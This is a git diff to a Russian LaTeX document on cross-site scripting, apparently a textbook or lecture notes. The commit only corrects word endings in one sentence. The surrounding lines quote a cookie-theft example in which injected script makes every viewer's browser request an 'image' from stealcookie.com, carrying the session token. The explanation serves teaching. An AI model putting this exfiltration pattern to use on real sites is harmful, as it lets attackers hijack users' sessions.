xss.tex: исправлены окончания

--- a/xss.tex
+++ b/xss.tex
@@ -26,7 +26,7 @@ auth=AJHVML43LDSL42SC6DF;
 </script>
 \end{verbatim}
 
-Тогда браузер всех пользователей, которым показывается сообщение, при загрузке страницы отправит HTTP GET-запрос на получение файла <<изображения>> по адресу
+Тогда браузеры всех пользователей, которым показывается сообщение, при загрузке страницы отправят HTTP GET-запрос на получение файла <<изображения>> по адресу
 \begin{center} \begin{verbatim}
 http://stealcookie.com?auth=AJHVML43LDSL42SC6DF;
 \end{verbatim} \end{center}
